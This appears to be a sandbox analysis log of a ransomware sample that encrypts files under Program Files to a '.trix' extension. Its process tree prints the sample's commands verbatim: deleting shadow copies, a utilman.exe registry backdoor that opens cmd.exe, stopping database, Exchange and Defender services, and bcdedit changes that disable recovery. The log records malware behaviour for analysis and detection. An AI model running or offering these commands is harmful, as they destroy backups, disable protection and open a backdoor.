File created	C:\Program Files\Windows Defender\MpSvc.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\shellext.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\application.ini	svhost1.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpUXSrv.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\shellext.dll	svhost1.exe
File created	C:\Program Files\7-Zip\History.txt_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\DebugGet.cab	svhost1.exe
File created	C:\Program Files\GetUnblock.nfo_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	svhost1.exe
File created	C:\Program Files\AssertConnect.bmp_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Microsoft Office\FileSystemMetadata.xml	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\ProtectionManagement.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\SymSrv.yes_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\SymSrv.yes	svhost1.exe
File opened for modification	C:\Program Files\GetDeny.wpl	svhost1.exe
File created	C:\Program Files\ReceiveConfirm.temp_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files (x86)\desktop.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\ieinstal.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmprph.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\MpClient.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\mozavcodec.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\ucrtbase.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\xul.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpResL.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\ConvertFromClose.docx	svhost1.exe
File created	C:\Program Files\GetDeny.wpl_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\ImportGet.eps	svhost1.exe
File opened for modification	C:\Program Files\InvokeResize.asp	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmplayer.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\AmStatusInstall.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpAsDesc.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\NisSrv.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\vcruntime140.dll	svhost1.exe
File created	C:\Program Files\RequestPing.jpeg_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\IEShims.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\NisLog.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\ProtectionManagement_Uninstall.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7zCon.sfx_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\updater.ini_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\IA2Marshal.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\qipcap64.dll	svhost1.exe
File opened for modification	C:\Program Files\AssertConnect.bmp	svhost1.exe
File opened for modification	C:\Program Files\SaveDismount.wps	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\Defendericon.png_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozglue.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\msvcp140.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\InvokeRevoke.xltx_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\ClientWMIInstall.mof_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\firefox.exe.sig_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	svhost1.exe
File created	C:\Program Files\ConvertFromClose.docx_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpCmdRun.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7-zip.chm_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\License.txt_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\mozglue.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\updater.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\LockTest.nfo_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\SuspendRevoke.dotm_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\ielowutil.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\wmpconfig.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\libGLESv2.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\nss3.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\pingsender.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\CompareDismount.jfif_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\ReceiveSend.3gpp_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\mpvis.DLL	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\AMMonitoringProvider.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\mozavutil.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\DefenderCSP.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\7-Zip\7zG.exe_ID_625234068_[[email protected]].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\softokn3.dll	svhost1.exe
File created	C:\Program Files\CompleteReset.emf_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\RequestPing.jpeg	svhost1.exe
File created	C:\Program Files\Internet Explorer\hmmapi.dll_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpOAV.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement_Uninstall.mof	svhost1.exe
File created	C:\Program Files\7-Zip\7z.sfx_ID_625234068_[[email protected]].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	svhost1.exe

C:\Users\Admin\AppData\Local\Temp\svhost1.exe
"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Drops file in Program Files directory
PID:664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -Command -
  2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" view
    3⤵
    - Discovers systems in the same network
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -Command -
  2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3712
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:3180
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
    3⤵
    - Sets file execution options in registry
    PID:1872
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
    3⤵
    - Sets file execution options in registry
    PID:1912
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
    3⤵
    PID:3328
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
    3⤵
    PID:2272
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
    3⤵
    PID:496
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
    3⤵
    PID:3648
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
    3⤵
    PID:3800
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
    3⤵
    PID:1080
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
    3⤵
    PID:2860
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
    3⤵
    PID:732
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
    3⤵
    PID:2108
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
    3⤵
    PID:3552
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
    3⤵
    PID:276
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
    3⤵
    PID:3888
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
    3⤵
    PID:3540
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
    3⤵
    PID:1836
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
    3⤵
    PID:2252
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
    3⤵
    PID:3052
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
    3⤵
    PID:508
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
    3⤵
    PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
    3⤵
    PID:3992
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
    3⤵
    PID:2220
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
    3⤵
    PID:992
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
    3⤵
    PID:1060
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
    3⤵
    PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
    3⤵
    PID:1008
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
    3⤵
    PID:268
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
    3⤵
    PID:3848
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
    3⤵
    PID:1476
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
    3⤵
    PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
    3⤵
    PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
    3⤵
    PID:3132
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
    3⤵
    PID:2252
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
    3⤵
    PID:3444
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
    3⤵
    PID:508
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
    3⤵
    PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
    3⤵
    PID:3992
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
    3⤵
    PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
    3⤵
    PID:1252
- - C:\Windows\system32\bcdedit.exe
    "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:408
- - C:\Windows\system32\bcdedit.exe
    "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1060